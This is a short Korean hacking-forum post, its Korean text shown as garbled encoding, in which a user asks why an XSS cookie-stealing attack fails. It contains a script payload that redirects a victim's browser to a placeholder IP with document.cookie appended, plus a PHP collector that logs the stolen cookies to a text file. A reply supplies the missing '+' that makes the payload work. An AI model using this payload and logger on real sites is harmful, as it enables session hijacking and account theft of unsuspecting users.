215, 1/11 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   usj1004s
   xss Áú¹®ÀÔ´Ï´Ù

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=192 [º¹»ç]


À¥ <script>document.location="http://ipÁÖ¼Ò/cook2.php?data="document.cookie</script>

php
<?
$cookie=$_GET['data'];
$atime=date("y-m-d H:i:s");
$log=fopen("data2.txt","a");
fwrite($log,$atime." Hellow Word! ".$cookie."\r\n");
fclose($log);
?>

xss Å×½ºÆ®Áß¿¡ ¹®Á¦Á¡ÀÌ Ç®¸®Áú ¾Ê¾Æ Áú¹®µå¸³´Ï´Ù.. ¤Ð¤Ð
À¥¿¡¼­ Á¤È®È÷ °æ·Î ÁöÁ¤À» ÇØÁÖ¾úÀ¸³ª ³¯Â¥ hellow word¸¸ data2.txt ÆÄÀÏ¿¡ Àü´ÞÀ̵ǰí Äí۰¡ Àü´ÞÀÌ µÇÁö ¾Ê´Â ÀÌÀ¯¸¦ ¾Ë°í ½Í½À´Ï´Ù.
¸¹Àº Á¶¾ð ²ÀÁ» ºÎʵ右´Ï´Ù!

  Hit : 3848     Date : 2014/12/06 01:32



    
rubiya +document.cookie 2014/12/08